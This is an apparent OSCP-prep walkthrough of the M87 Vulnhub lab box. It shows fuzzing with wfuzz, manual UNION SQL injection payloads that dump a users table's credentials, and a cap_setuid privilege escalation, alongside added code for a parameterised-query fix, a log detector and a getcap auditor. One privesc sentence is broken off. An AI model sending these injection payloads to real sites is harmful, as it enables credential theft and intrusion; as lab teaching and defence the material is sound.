Preparing for the OSCP exam means you need to know the basics, but you also need the experience. There is perhaps no better way to test how prepared you are for the exam than by hacking web apps. In this walkthrough, we will cover one important skill to master, SQL injection without Metasploit. The M87 Vulnhub walkthrough will teach you how to do this so that you can feel confident in taking the exam no matter what is on the test.



What Is SQL Injection?

SQL Injection is a code injection technique used by hackers to affect the database that is running behind the web application in order to expose or manipulate data that should otherwise not be accessible.

How To Do SQL Injection?

The best way to do SQL injection on the M87 box is to:

  1. Fuzz for available PHP parameters.
  2. Test for SQL Injection vulnerability by supplying the parameter with various inputs.

Initial Enumeration

The first step of a penetration test is to check which hosts are active on the network. Oftentimes a Vulnhub machine will not display its IP address, which means you must find it. One way is to use fping, a native binary on Kali Linux machines.

fping -ga x.x.x.0/24 2> /dev/null 

Right away we see that the box has some web ports open, which means the initial exploit vector will likely be a web app.

How to Fuzz PHP Parameters

An important ethical hacking skill for web apps that I find the OSCP material does not cover well is fuzzing PHP parameters. This is a good example of how ethical hacking is both an art and a science. My tool of choice is wfuzz.

wfuzz --hw 161 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.1.162/admin/backup/?FUZZ=

We see that there is a PHP parameter, "id" (--hw 161 hides every response with the baseline word count of 161, so only parameter names that change the page are shown).

SQL Injection Without SQLMap

The OSCP exam does not allow the use of automated exploitation tools such as SQLMap (boo), but don't be afraid: the idea of being OSCP-certified is to know enough to be dangerous, not to be an expert. (Although an expert is technically anyone who knows more than most about a particular subject.)

  1. Add a single quote to id=1' to test if SQL injection is possible.
  2. If so then next we need to find out the name of the database.
  3. We need to enumerate the columns of the tables of the database in order to find credentials as this is likely the intended design of the box.

With that said, one of the first tests I perform is to check whether the id parameter is vulnerable to SQL injection.

Now that we know the name of the database we can get the names of the other columns by sequentially changing the limit parameter to 2,1, then 3,1 and so forth.

http://192.168.1.162/admin/backup/index.php?id=16 or 1=2 union select (select column_name from information_schema.columns where table_schema='db' and table_name='users' limit 1,1)

Now to dump the database. This is as simple as moving through the limit again starting with 1,1 and going to 2,1 and so on.

index.php?id=99 or 1=2 union select (select concat(id," ",email," ",username," ",password) from users limit 0,1)

By manipulating the column list and the row offset we can extract the credentials that are stored in the database.

index.php?id=99 or 1=2 union select (select concat(id," ",email," ",username," ",password) from users limit 8,1)

The final query dumps the last row in the table; we will use this password to log in to the web app. This brings up an important technique: trying the captured passwords against your list of captured usernames in order to log in.
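To show why the id parameter behaves this way, and what the fix looks like, here is an added example that is not part of the original walkthrough or the M87 box. It models the backup page with an in-memory SQLite database (constructed tables and made-up rows; the users columns are the ones the concat() query above names). SQLite has no information_schema or concat(), so pragma_table_info() and || stand in for them; the payload shapes are otherwise the walkthrough's. The vulnerable function pastes the id into the query text, the hardened one validates it as an integer and binds it as a parameter:

```python
import sqlite3

# Constructed stand-in for the box's database. The "users" columns are the ones the
# walkthrough's concat() query names; every value here is made up.
SCHEMA = """
CREATE TABLE backups (id INTEGER PRIMARY KEY, filename TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, username TEXT, password TEXT);
INSERT INTO backups VALUES (1, 'site-2021-01-01.tar.gz'), (16, 'db-2021-02-01.sql');
INSERT INTO users VALUES
  (1, 'alice@example.test', 'alice', 'hash-placeholder-1'),
  (2, 'bob@example.test',   'bob',   'hash-placeholder-2');
"""


def make_db():
    """Fresh in-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind the finding: ?id= is pasted into the SQL text, so the
    value can finish the WHERE clause and append a UNION of its own."""
    sql = f"SELECT filename FROM backups WHERE id={user_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, user_id):
    """Hardened version: the id is validated as an integer and bound as a
    parameter, so the database never interprets it as SQL."""
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return []  # reject rather than try to sanitise the string
    rows = conn.execute("SELECT filename FROM backups WHERE id=?", (id_int,))
    return [row[0] for row in rows]


# The walkthrough's two payload shapes translated to SQLite: pragma_table_info()
# stands in for information_schema.columns and || for concat().
COLUMN_PAYLOAD = ("16 or 1=2 union select "
                  "(select name from pragma_table_info('users') limit 1,1)")
DUMP_PAYLOAD = ("99 or 1=2 union select "
                "(select id || ' ' || email || ' ' || username || ' ' || password "
                "from users limit 0,1)")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, column enumeration:", lookup_vulnerable(db, COLUMN_PAYLOAD))
    print("vulnerable, row dump:          ", lookup_vulnerable(db, DUMP_PAYLOAD))
    print("fixed, same payload:           ", lookup_fixed(db, DUMP_PAYLOAD))
    print("fixed, legitimate id:          ", lookup_fixed(db, "16"))
```

The column payload returns both the real backup row and a column name, which is exactly the "or 1=2 union" trick from the walkthrough; the dump payload returns a whole users row through the one-column result. Against lookup_fixed the same strings return nothing because they are not integers, and even a value that passed validation would only ever be compared as data. In PHP the equivalent fix is an (int) cast plus a PDO or mysqli prepared statement with a bound parameter.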
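From the other side of the wire, both the wfuzz parameter run above and the union queries in this section leave a distinctive trail in the web server log. The following added example (mine, not code from the walkthrough or the box) parses Apache combined-format lines and flags two things: one client trying many distinct parameter names against one path (the fuzzing stage) and single requests whose decoded query string carries the probe shapes used here (a trailing quote, union select, information_schema, or 1=2). The log lines are constructed to mirror the walkthrough's requests, and the 20-name threshold is an assumption to tune per site:

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" format: client ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Shapes of the walkthrough's probes, matched against the URL-decoded, lower-cased query.
SQLI_PATTERNS = {
    "quote probe": re.compile(r"=[^&]*'\s*(?:&|$)"),               # id=1'
    "union select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "or/and n=m": re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+\b"),   # or 1=2
}


def parse_line(line):
    """One log line -> dict with ip, path, decoded query and raw parameter names."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)
    # Keep empty values: wfuzz's "?name=" probes carry no value at all.
    rec["params"] = [p.split("=", 1)[0] for p in query.split("&") if p]
    return rec


def sqli_indicators(query):
    """Names of the SQLI_PATTERNS that match this decoded query string."""
    q = query.lower()
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(q)]


def analyze(lines, fuzz_threshold=20):
    """Return findings: one per request with SQLi indicators, plus one per
    (client, path) pair that tried at least fuzz_threshold distinct parameter names."""
    findings = []
    names_seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        names_seen[(rec["ip"], rec["path"])].update(rec["params"])
        hits = sqli_indicators(rec["query"])
        if hits:
            findings.append({"type": "sqli", "ip": rec["ip"], "path": rec["path"],
                             "indicators": hits, "query": rec["query"]})
    for (ip, path), names in names_seen.items():
        if len(names) >= fuzz_threshold:
            findings.append({"type": "param-fuzzing", "ip": ip, "path": path,
                             "distinct_params": len(names)})
    return findings


# Constructed log lines modelled on the walkthrough's requests: a wfuzz run with a
# parameter-name wordlist against /admin/backup/, then manual probes of ?id=.
_FUZZ_NAMES = ["user", "page", "file", "action", "name", "token", "search", "q", "view",
               "cat", "lang", "debug", "path", "dir", "type", "sort", "order", "limit",
               "offset", "format", "key", "mode", "ref", "cmd", "id"]
SAMPLE_LOG = [
    # Only the real parameter ("id") changes the page, which is what wfuzz's --hw
    # word-count filter separates from the identical baseline responses.
    f'10.0.0.5 - - [01/Mar/2021:10:00:{i:02d} +0000] "GET /admin/backup/?{n}= HTTP/1.1" '
    f'200 {203 if n == "id" else 161}'
    for i, n in enumerate(_FUZZ_NAMES)
] + [
    '10.0.0.9 - - [01/Mar/2021:10:05:00 +0000] "GET /admin/backup/index.php?id=1%27 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Mar/2021:10:05:30 +0000] "GET /admin/backup/index.php?id=16%20or%201=2%20union'
    '%20select%20(select%20column_name%20from%20information_schema.columns%20where%20table_name='
    '%27users%27%20limit%201,1) HTTP/1.1" 200 240',
    '10.0.0.21 - - [01/Mar/2021:10:06:00 +0000] "GET /admin/backup/index.php?id=16 HTTP/1.1" 200 203',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Feed it real lines with analyze(open("/var/log/apache2/access.log")). The fuzzing rule keys on distinct names rather than request count so a busy but legitimate client is not flagged, and the SQLi rules run on the decoded query so %20 and %27 encoding does not hide the payload; a POST body would need the same checks applied at the application or WAF layer, since it never reaches the access log.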

M87 Vulnhub Linux Privilege Escalation

A simple enumeration for Linux privilege escalation finds that the charlotte user can . The getcap tool lists the file capabilities set on an executable. It turns out this /usr/bin/old file is the Python binary. It carries the cap_setuid+ep capability, which means CAP_SETUID is both permitted and effective for that program, so any process running it can change its own user ID. We can do anything then! This includes abusing the feature to escalate privileges to root.
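The same getcap output is what a defender should be auditing, and a renamed interpreter like /usr/bin/old is easy to miss when reading it by eye. Here is an added example (my code, not from the walkthrough or the box) that parses getcap -r output in both layouts libcap has used, scores each entry, and rates a high-risk capability as critical when the file is an interpreter. The sample lines are constructed; the realpath mapping that reveals /usr/bin/old as a Python binary is a hypothetical input you would fill from readlink -f or file, and "/usr/bin/python3" is a made-up stand-in for whichever Python the box shipped:

```python
import re

# getcap has printed two layouts over the years; both are accepted here:
#   libcap < 2.41:  /usr/bin/old = cap_setuid+ep
#   libcap >= 2.41: /usr/bin/old cap_setuid=ep
GETCAP_RE = re.compile(
    r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$"
)

# Capabilities that amount to root when effective on a general-purpose binary.
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_fowner", "cap_chown",
}

# Binaries that run arbitrary code for their caller; a high-risk capability on one
# of these hands that capability to every user who can execute it.
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|bash|sh|dash|zsh)[0-9.]*")


def parse_getcap_line(line):
    """Split one getcap output line into path, capability set and flag letters."""
    m = GETCAP_RE.match(line.strip())
    if not m:
        return None
    return {"path": m["path"], "caps": set(m["caps"].split(",")), "flags": m["flags"]}


def is_interpreter(path, realpaths):
    """A renamed copy such as /usr/bin/old hides what it is; realpaths is a
    hypothetical path -> real file mapping (from readlink -f or file) so the
    check runs on the real name rather than the alias."""
    target = realpaths.get(path, path)
    return INTERPRETER_RE.fullmatch(target.rsplit("/", 1)[-1].lower()) is not None


def classify(entry, realpaths):
    """Severity of one file-capability entry."""
    risky = entry["caps"] & HIGH_RISK
    if not risky or "e" not in entry["flags"]:
        return "low"  # e.g. cap_net_raw on ping, or a capability that is not effective
    return "critical" if is_interpreter(entry["path"], realpaths) else "high"


def audit(getcap_lines, realpaths=None):
    """Run over `getcap -r / 2>/dev/null` output; returns findings worst-first."""
    realpaths = realpaths or {}
    order = {"critical": 0, "high": 1, "low": 2}
    findings = []
    for line in getcap_lines:
        entry = parse_getcap_line(line)
        if entry is None:
            continue
        entry["severity"] = classify(entry, realpaths)
        findings.append(entry)
    return sorted(findings, key=lambda e: (order[e["severity"]], e["path"]))


# Constructed getcap output modelled on the walkthrough's finding; the realpath for
# /usr/bin/old is a made-up stand-in for whichever Python the box shipped.
SAMPLE_GETCAP = [
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/old = cap_setuid+ep",
    "/usr/sbin/arping cap_net_raw=ep",
    "/usr/lib/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep",
]
SAMPLE_REALPATHS = {"/usr/bin/old": "/usr/bin/python3"}

if __name__ == "__main__":
    for f in audit(SAMPLE_GETCAP, SAMPLE_REALPATHS):
        print(f"{f['severity']:8} {f['path']}  {','.join(sorted(f['caps']))}+{f['flags']}")
```

Paths containing spaces are not handled by the regex, which is the same limitation getcap's own output has. For the box's finding the remediation is to drop the capability with setcap -r /usr/bin/old (or remove the stray copy of the interpreter) and to treat any cap_setuid, cap_setgid, cap_dac_override or cap_sys_admin entry on an interpreter as a root-equivalent misconfiguration in your baseline.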

That’s it for the M87 Vulnhub box, we are now root and can claim the flag.

